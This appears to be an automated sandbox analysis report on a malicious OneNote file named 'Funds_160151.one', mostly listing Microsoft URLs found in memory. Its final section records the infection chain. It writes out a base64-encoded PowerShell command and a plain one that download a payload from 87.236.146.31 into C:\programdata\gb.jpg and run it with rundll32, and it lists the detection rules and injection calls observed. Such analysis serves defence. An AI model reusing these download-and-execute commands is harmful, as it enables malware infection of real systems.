Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://graph.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://invites.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://login.windows.local
Source: App_1675800120151438600_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log.0.dr	String found in binary or memory: https://login.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://make.powerautomate.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://management.azure.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://management.azure.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://onedrive.live.com
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://onedrive.live.com/about/de-ch/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://outlook.live.com/owa/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://schema.org
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://start.microsoftapp.net/start?pc_campaign=UHF_Banner_15mkts&adjust=y9xgnyl_5sblqid"
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://tasks.office.com
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://twitter.com/microsoft_ch
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.instagram.com/microsoftch/
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.linkedin.com/company/1035
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.onenote.com/?omkt=de-CH
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.skype.com/de/
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.xbox.com/
Source: de-ch[1].htm.16.dr	String found in binary or memory: https://www.youtube.com/user/MicrosoftCH

Source: global traffic

HTTP traffic detected: GET /38199.dat HTTP/1.1Host: 87.236.146.31Connection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\gb.jpg

Jump to dropped file

Source: 00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\Public\1.cmd, type: DROPPED	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_100194D0	15_2_100194D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_1001799F	15_2_1001799F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_100175E0	15_2_100175E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_10015207	15_2_10015207
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_10003EEA	15_2_10003EEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_10013BFA	15_2_10013BFA

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_1000A4A8 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,KiUserCallbackDispatcher,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,		15_2_1000A4A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_1000AA02 KiUserCallbackDispatcher,Wow64GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,		15_2_1000AA02

Source: e77242d6.dll.15.dr

Static PE information: Resource name: RT_MESSAGETABLE type: a.out little-endian 32-bit pure executable not stripped

Source: e77242d6.dll.15.dr	Static PE information: No import functions for PE file found
Source: gb.jpg.13.dr	Static PE information: No import functions for PE file found

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Section loaded: edgegdi.dll	Jump to behavior

Source: gb.jpg.13.dr

Static PE information: Data appended to the last section found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd	Jump to behavior
